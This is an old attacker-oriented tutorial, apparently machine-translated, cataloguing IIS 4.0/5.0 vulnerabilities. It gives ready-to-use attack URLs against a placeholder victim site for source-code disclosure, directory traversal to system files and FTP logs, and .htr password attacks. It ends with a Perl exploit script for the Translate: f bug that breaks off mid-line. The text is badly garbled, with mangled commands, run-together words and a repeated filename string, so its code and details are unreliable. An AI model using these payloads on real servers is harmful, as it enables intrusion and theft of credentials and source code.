BY xundi
========= MDAC-Local command execution =========== You may think this vulnerability is too old, can be so large, there may be a lot of IIS web servers exist this vulnerability La. IIS's MDAC component exists that a vulnerability can cause an attacker to remotely execute your system command. The main core problem is to exist in RDS DataFactory. By default, it allows the remote command to send to the IIS server, this command runs as a device user, which is generally the SYSTEM user by default. Regarding this vulnerability, many articles are very clear, not explained in detail here, if you want to check if you have this vulnerability, you can pass the following: c: /> nc -nw -w 2
4, only the files under the same partition can be viewed (so install the IIS directory and Winnt partition is a good note, or better prevent the latest IIS5.0's Unicode vulnerability) .5, an attacker needs to know the request. name. For example, you find this file and meet the above requirements, you can request the following command: http://www.victim.com/iisample/exair/howitworks/codebrws.asp? Source = / iisamples / exair / howitWorks / Codebrws. ASP You can check the source code of Codebrws.asp. You can also use showcode.asp to view files: http://www.victim.com/msadc/samples/selector/showcode.asp? Source = / msadc /../../../ .. /winnt/win.ini Of course I want to view some FTP information to get other machines that are frequently used by other target administrators, maybe the security of his other machines is poor than Web;), such as: http: // xxx .XXX.XXX.XXX / MSADC / SAMPLES / SELECTOR / Showcode.asp? Source = / msadc / Samples / Winnt / System32 / Logfiles / MSFTPSVC1 / EX00517.LOG ========= Null.htw =============== IIS If INDEX Server is running, it contains a vulnerability related to null.htw, which is not on the server. There is this. Htw ended file. This vulnerability will result in the source code of the ASP script, including sensitive information such as user name and password in Global.asa. Tools If you provide a special URL request to IIS, you can jump out of the virtual directory, provide access to the logical partition and root directory. This "hit-highlighting" function does not fully prevent the request of various types of files in Index Server, so that the attacker will access any file on the server. NULL.HTW function You can get 3 variables from user input: CiWebhitsFile Cirestriction CiHilittype You can transfer variables with the following method to get the source code such as default.asp: http://www.victim.com/null.htw? CiWebhitsFile = / Default.asp% 20 &% 20CIRESTRICTION = None% 20 &% 20 & CiHilittype = FULL does not need a legal .htw file because the virtual file has been stored in memory. ======== WebHits.dll & .htw ================ This hit-highligting feature is provided by INDEX Server to allow a web user on the document HIGHLIGHTED ( Highlight the entry of their original search, the name of this document passes the .htw file through the variable ciWebhitsFile, webhits.dll is an ISAPI application to handle the request, open the file and return the result, when the user controls the CiWebhitsFile parameter to pass to .htw They can request any files, resulting in viewing the ASP source and other script file content.
To know if you have this vulnerability, you can request the following entry: http://www.victw If you get the following information from the server: Format of the query_string is invalid This means you have this vulnerability. This problem is mainly webhits.dll's map of the .htw file, so you can avoid this vulnerability as long as you cancel this mapping, you can search for .htw files in the system you think there is a vulnerability, usually find the following procedures: / iissamples / issamples / oop / qfullhit.htw / iissamples / issamples / oop / qsumrhit.htw / isssamples / exair / search / qfullhit.htw / isssamples / exair / search / qsumrhit.htw / isshelp / iss / misc / iirturnh.htw ( This general purpose to use it) An attacker can use the following methods to access the contents of the file in the system: http://www.victim.com/iissample/issample/oop/qfullhit.htw? CiWebhitsFile = / .. / .. /winnt/win.ini&cirestriction=none&cihilittype=full will be in this vulnerability system. === ASP Alternate Data streams (:: $ data) ================== $ data This vulnerability is published in the mid-1998, $ data is in the NTFS file system The Main Data Stream property stored in the file, by establishing a special format URL, you might use IIS to access this Data Stream (data stream) in your browser, which also shows these Data Street in the file code (data Streaming) and the data code contained in any file. This vulnerability requires the following limitations, one is to display the file to be saved in the NTFS file partition (fortunately for "security" a multi-server set NTFS format), the second is that the file needs to be set to globally readable. And unauthorized users need to know the name of the file name, IIS 1.0, 2.0, 3.0, and 4.0 in WIN NT exist this problem. Microsoft provides a version of For IIS3.0 and 4.0, you can patch this vulnerability through this article: "Supporting NTFS Alternate Data Streams By Asking WindowsNt To Make The File Name Canon" To view some .asp file content, you You can get the source code in the URL: http://www.victim.com/default.asp :: $ data.
You have to understand the data flow problem in the NTFS file system, you may take this article: http://focus.silversand.net/newsite/skill/NTFS.TXT =========Aasp Dot bug ==================== This vulnerability is a relatively early vulnerability, which is the defect discovered in 1997 in 1997. This vulnerability is also leaking the ASP source code to an attacker. This vulnerability is typically existed on IIS3.0, adding one or more points at the end of the requested URL, resulting in leaking the ASP source code. http://www.victim.com/sample.asp.=======m.dll buffer truncated vulnerability =============== This vulnerability is by Cerberus Information Security Team. The earliest discovered, it runs on IIS 4.0 and 5.0, allowing attackers to view any file content and source code. By adding nearly 230 or?% 20? (These represent spaces) after the file name and add? Htr® special request to IIS, will IIS think that the client request is? .Htr? File, and .htr? The suffix of the file is mapped to the ISM.dllisapi application so that IIS transfers this .htr request to this DLL file, then ISM.DLL program opens and execute the passed file, but before the ISM.DLL truncation information, the buffer Send a truncated .htr and there will be some time to return some file content you want to open. Unless the web service stops and restarts, this attack can only be effectively executed. If a .htr request has been sent to the machine, then this attack will fail. It can only work when ISM.DLL first loads the memory. CNNS discovers the additional number to no attack, you can do multiple times attack. http://www.victim.com/global.asa (...<=230 )global.asa.htr================================================================================== =================== This vulnerability actually similar ASP DOT vulnerability, which can display its web directory information on IIS4.0, very strange to say some still in IIS5. 0 This kind of vulnerability is found, by increasing? IDC? Or? IDA? Suffix to the URL will cause the IIS attempt to run. IIS attempt to run .idc, if this .IDC does not exist, it returns some information to customers end.
http://www.victim.com/aNything.idc or anything.idq =================================== ========== This vulnerability is similar to the NSFOCUS, and the URL request to append .htr for some ASA and ASP will lead to the disclosure of the file source code: http://www.victim.com/global .asa .htr =========== Nt Site Server adsamples vulnerability ====== By requesting Site.csc, it is generally saved in /adsamples/config/site.csc, and attackers may get some For example, some information in the database, such as http://www.victim.com/adsamples/config/site.csc========== Some violent cracks. Htr.htr Program =========== IIS4.0 contains an interesting feature that allows the remote user to attack the user account on the web server, that is, your web server converts the address through NAT, and can also be attacked . Each IIS4.0 is installed to create a virtual directory / iisadmpwd, this directory contains multiple .htr files, anonymous users allow access to these files, these files just have not specified only in loopback addr (127.0.0.1), requested these files Jump out of the dialog, let you modify the user's account and password through the web. This directory physical map under the directory below: c: /winnt/system32/inetsrv/iisadmpwdachg.htraexp.htraexp2.htraexp2b.htraexp3.htraexp4.htraexp4b.htRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRAEXP4B.HTRANOT.HTRANOT3.HTR This, attackers can guess your password . If you don't use this service, you will delete this directory first. ============= tSlate: f bug ==================== Daniel docekal in 2000, on August 15th released this vulnerability (Www.securityfocus.com/bid/1578) The problem is to exist in WebDAV in Office 2000 and FrontPage 2000Server Extensions. When someone requests other scripts of ASP / ASA, in HTTP GET plus Translate: F suffix And on the request file and the file code will be displayed, of course, without playing Win2K SP1 patch.
This is a W2K vulnerability, but since the FP2000 is also installed on IIS4.0, this vulnerability is also available on IIS4.0, you can use the following script to use this vulnerability: ########### ################## @ o :: socket; #my ($ port, $ sock, $ server); # $ size = 0; ####### ###################### $ server = "$ argv [0]"; $ s = "$ server"; $ port = "80"; $ cm = "$ argv [1]"; & connect; sub connect {if ($ # Argv <1) {howto (); exit;} $ VER = "Get / $ cm% 5C http / 1.0host: $ serverAccept: * / * Translate: F / N / N "; MY ($ Iaddr, $ Paddr, $ Proto); $ Iaddr = INET_AON ($ Server) || DIE" Error: $! "; $ Paddr = SockAddr_in ($ Port, $ Iaddr) || Die "Error: $!"; $ proto = getprotobyname ('TCP') || DIE "Error: $!"; Socket (Sock, PF_INET, SOCK_STREAM, $ proto) || DIE "error: $ ! ";" Connect (SOCK, $ PADDR) || Die "Error: $!"; Send (SOCK, $ VER, 0) || Die "can't to send packet: $!"; Open (out, "> $ server.txt "); Print" DUMPING $ cm to $ server.txt / n "; while (